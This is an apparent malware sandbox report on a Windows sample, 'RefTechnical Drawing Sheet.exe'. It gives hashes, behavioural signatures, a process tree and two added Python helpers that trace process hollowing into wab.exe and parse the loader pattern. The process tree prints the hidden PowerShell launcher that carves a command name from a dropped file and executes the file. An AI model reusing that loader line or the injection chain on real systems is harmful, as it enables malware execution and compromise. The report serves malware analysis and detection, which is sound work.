Analysis

max time kernel: 53s
max time network: 60s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/03/2024, 03:56
Static task: static1
Behavioral task behavioral1: sample RefTechnical Drawing Sheet.exe, resource win7-20240221-en
Behavioral task behavioral2: sample RefTechnical Drawing Sheet.exe, resource win10v2004-20240226-en
Behavioral task behavioral3: sample Bedwarmer.ps1, resource win7-20240221-en
Behavioral task behavioral4: sample Bedwarmer.ps1, resource win10v2004-20240226-en
General

Target: RefTechnical Drawing Sheet.exe
Size: 963KB
MD5: 2f96e6fd36ceec8c32dcc6c7607a87bd
SHA1: 89b9bd60c39a582da440112f12f939c90102d567
SHA256: 11bfafb62ab5e5c115862409c849f069dc0903abf0f864783bea73472db19932
SHA512: 755e29062263821fac7c37be3dd7e0b980804adbe301d1945c9098ca1cb8ae57f293a022a2e11677e404bac323b4e5995d4c57d45c2edb13595ff151547993b9
SSDEEP: 12288:wbZfqmfr+7Iz6tuhHr2WX3rLKJQEKKHP9SxG4A1wF7dieRJ14BEtIX2UgGj+Xtah:wbZCmf67FtuZFX3KJQgl4KEoEoePUF3Z
Malware Config
Signatures
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 67: drive.google.com
  flow 68: drive.google.com
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  PID 2952 wab.exe
  PID 2952 wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID 4984 powershell.exe
  PID 2952 wab.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 4984 powershell.exe set thread context of PID 2952 (procid_target 104)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  PID 4984 powershell.exe (10 hits)
- Suspicious behavior: MapViewOfSection (1 IoC)
  PID 4984 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 4984 powershell.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  PID 3036 RefTechnical Drawing Sheet.exe wrote to memory of PID 4984 (procid_target 89), 3 times
  PID 4984 powershell.exe wrote to memory of PID 2496 (procid_target 99), 3 times
  PID 4984 powershell.exe wrote to memory of PID 2952 (procid_target 104), 5 times
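The WriteProcessMemory and SetThreadContext rows above are the raw material for spotting the injection chain, but the sandbox prints them run together. The script below is an added example (not part of this report or of the sandbox's tooling) that parses those rows, counts writes per source/target pair, and flags the pair that also has a SetThreadContext, which is the CreateProcess-suspended, write, set-context, resume sequence used for process hollowing. The record strings are constructed from the rows above, split one per line; the PID-to-image map is taken from the process tree below. Writes alone are not treated as evidence, because a parent writing into a child it just spawned (cmd.exe here) is routine.

```python
"""Reconstruct the injection chain from the sandbox's per-process signature records."""
import re
from collections import defaultdict

# Constructed input: the IoC rows of the WriteProcessMemory and SetThreadContext
# signatures in this report, one record per line (the report prints them run together).
WPM_RECORDS = """
PID 3036 wrote to memory of 4984 3036 RefTechnical Drawing Sheet.exe 89
PID 3036 wrote to memory of 4984 3036 RefTechnical Drawing Sheet.exe 89
PID 3036 wrote to memory of 4984 3036 RefTechnical Drawing Sheet.exe 89
PID 4984 wrote to memory of 2496 4984 powershell.exe 99
PID 4984 wrote to memory of 2496 4984 powershell.exe 99
PID 4984 wrote to memory of 2496 4984 powershell.exe 99
PID 4984 wrote to memory of 2952 4984 powershell.exe 104
PID 4984 wrote to memory of 2952 4984 powershell.exe 104
PID 4984 wrote to memory of 2952 4984 powershell.exe 104
PID 4984 wrote to memory of 2952 4984 powershell.exe 104
PID 4984 wrote to memory of 2952 4984 powershell.exe 104
"""
STC_RECORDS = """
PID 4984 set thread context of 2952 4984 powershell.exe 104
"""

# Record layout: PID <src> <verb> <dst> <src again> <src image> <target procid>
WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (.+?) (\d+)$")
STC_RE = re.compile(r"PID (\d+) set thread context of (\d+) \1 (.+?) (\d+)$")

# Images of the target PIDs are not in the records; they come from the process tree.
PROCESS_IMAGES = {
    3036: "RefTechnical Drawing Sheet.exe",
    4984: "powershell.exe",
    2496: "cmd.exe",
    2952: "wab.exe",
}


def parse_records(text, pattern):
    """Return (src_pid, dst_pid, src_image) tuples. Duplicates are kept: the count is a signal."""
    out = []
    for line in text.strip().splitlines():
        m = pattern.match(line.strip())
        if m:
            out.append((int(m.group(1)), int(m.group(2)), m.group(3)))
    return out


def write_counts(wpm):
    """Number of WriteProcessMemory records per (source, target) pair."""
    counts = defaultdict(int)
    for src, dst, _ in wpm:
        counts[(src, dst)] += 1
    return dict(counts)


def hollowing_candidates(wpm, stc):
    """Pairs where the same source both wrote into the target and set its thread context.
    A parent writing into a child it just spawned is not enough on its own, so a
    SetThreadContext from the same source is required."""
    counts = write_counts(wpm)
    return [(src, dst) for src, dst, _ in stc if counts.get((src, dst), 0) > 0]


def describe(src, dst):
    """Human-readable edge, e.g. 'powershell.exe (4984) -> wab.exe (2952)'."""
    return f"{PROCESS_IMAGES.get(src, '?')} ({src}) -> {PROCESS_IMAGES.get(dst, '?')} ({dst})"


if __name__ == "__main__":
    wpm = parse_records(WPM_RECORDS, WPM_RE)
    stc = parse_records(STC_RECORDS, STC_RE)
    for pair, n in sorted(write_counts(wpm).items()):
        print(f"{describe(*pair)}: {n} write(s)")
    for pair in hollowing_candidates(wpm, stc):
        print("hollowing candidate:", describe(*pair))
```

Run stand-alone it lists the three write edges and reports the single powershell.exe to wab.exe edge as the hollowing candidate; the same logic applies unchanged to any other report from this sandbox once the rows are split per line.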
Processes

C:\Users\Admin\AppData\Local\Temp\RefTechnical Drawing Sheet.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\RefTechnical Drawing Sheet.exe"
  PID: 3036
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Trykimprgnerede=Get-Content 'C:\Users\Admin\AppData\Local\butikstiders\Sjunger\Bedwarmer.Hom';$Ekstraparlementarisk=$Trykimprgnerede.SubString(59534,3);.$Ekstraparlementarisk($Trykimprgnerede)"
    PID: 4984
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
      PID: 2496
    C:\Program Files (x86)\windows mail\wab.exe
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      PID: 2952
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
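The powershell.exe command line in the tree above is a three-stage launcher: read a dropped file (Bedwarmer.Hom), carve a three-character substring out of it at a fixed offset, then use the call operator on that substring so the carved text becomes the command name and the whole file is its argument. The script below is an added example (not part of this report or of the sandbox's tooling) that pulls the path, offset and length out of a command line and replays the SubString step against the file contents. The sample command line is the one recorded above; the benign command line and the stand-in payload are constructed, the real Bedwarmer.Hom is not on this page, and "iex" as the carved command name is an assumption (it is the only three-character alias that would make the last stage execute the file as script). The replay assumes the file is a single line, so Get-Content yields one string rather than an array.

```python
"""Triage helper for the Get-Content / SubString / call-operator launcher pattern."""
import re
from dataclasses import dataclass
from typing import Optional

# Sample input: the PowerShell launcher exactly as recorded in the process tree
# of this report (PID 4984). Backslashes are doubled for the Python literal.
SAMPLE_CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$Trykimprgnerede=Get-Content '
    "'C:\\Users\\Admin\\AppData\\Local\\butikstiders\\Sjunger\\Bedwarmer.Hom';"
    "$Ekstraparlementarisk=$Trykimprgnerede.SubString(59534,3);"
    '.$Ekstraparlementarisk($Trykimprgnerede)"'
)

# Constructed benign command line: ordinary Get-Content use must not fire.
BENIGN_CMDLINE = 'powershell.exe -Command "Get-Content \'C:\\logs\\app.log\' | Select-String ERROR"'

GET_CONTENT_RE = re.compile(r"Get-Content\s+'([^']+)'", re.IGNORECASE)
SUBSTRING_RE = re.compile(r"\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.IGNORECASE)
# Call operator (. or &) applied to a variable holding the command name, with a
# second variable as the argument: .$name($data) or &$name($data)
CALL_VAR_RE = re.compile(r"[.&]\s*\$(\w+)\s*\(\s*\$(\w+)\s*\)")


@dataclass
class LoaderIndicators:
    payload_path: Optional[str]
    substring_offset: Optional[int]
    substring_length: Optional[int]
    invoked_variable: Optional[str]

    @property
    def suspicious(self) -> bool:
        """All three stages present: file read, name carved out, carved name invoked."""
        return (self.payload_path is not None
                and self.substring_offset is not None
                and self.invoked_variable is not None)


def analyze_cmdline(cmdline: str) -> LoaderIndicators:
    """Extract the stages of the launcher from a PowerShell command line."""
    gc = GET_CONTENT_RE.search(cmdline)
    ss = SUBSTRING_RE.search(cmdline)
    call = CALL_VAR_RE.search(cmdline)
    return LoaderIndicators(
        payload_path=gc.group(1) if gc else None,
        substring_offset=int(ss.group(1)) if ss else None,
        substring_length=int(ss.group(2)) if ss else None,
        invoked_variable=call.group(1) if call else None,
    )


def resolve_cmdlet(payload_text: str, offset: int, length: int) -> str:
    """Replay $payload.SubString(offset, length) on the dropped file's contents.

    Assumes a single-line file, so Get-Content returned one string (an assumption;
    a multi-line file makes Get-Content return an array). A truncated or wrong
    file is the usual failure: the offset then lies past the end.
    """
    if offset + length > len(payload_text):
        raise ValueError("offset beyond end of payload: wrong or truncated file")
    return payload_text[offset:offset + length]


def build_fake_payload(cmdlet: str, offset: int) -> str:
    """Constructed stand-in for Bedwarmer.Hom: filler, the command name at `offset`, filler.
    The real file's contents are not shown in this report."""
    return "A" * offset + cmdlet + "B" * 64


if __name__ == "__main__":
    ind = analyze_cmdline(SAMPLE_CMDLINE)
    print(ind, "suspicious =", ind.suspicious)
    fake = build_fake_payload("iex", ind.substring_offset)  # "iex" is an assumption
    print("carved command name:", resolve_cmdlet(fake, ind.substring_offset, ind.substring_length))
    print("benign suspicious =", analyze_cmdline(BENIGN_CMDLINE).suspicious)
```

With the real dropped file in hand, replace the stand-in with its contents: if the carved characters are not a command name, the file is not the one the launcher read, or Get-Content split it into lines and the offset applies per line.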
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 58KB
  MD5: aae5fcb1e66470ef7a08ea335b80ac05
  SHA1: 9422c0898c87a134c72c6ffa35c594d93dba9dc9
  SHA256: 8bd9205c7c8f112ff5cba1307842eddccc18e20e227cccb7b74e6a24e686b8b0
  SHA512: 031d187a47a9b687d6822f34e74029f2f1cf4eb8687dc2846a3d84efbf9d30d5459870842a22cdab89130915501e2593f79b2a32da5c266d382120e0a042b072
- Filesize: 347KB
  MD5: 1178f466a9ac164a3ca05ffd715235dc
  SHA1: e593a180adbbb864047e9dbc5e07a6d27a252139
  SHA256: 38bea98d1ec5467345cf29e1a7f1ec9a25fbe7801c8a498ec05e97b6dbf9545b
  SHA512: 61269e7303efba0f6d2790b780b9f4348567c6ad48481822201b37e13c17f255d35b368d109ba6c9d9a66d9af1adb7f2db9e3ec6ab1b351f80fce368f23a3650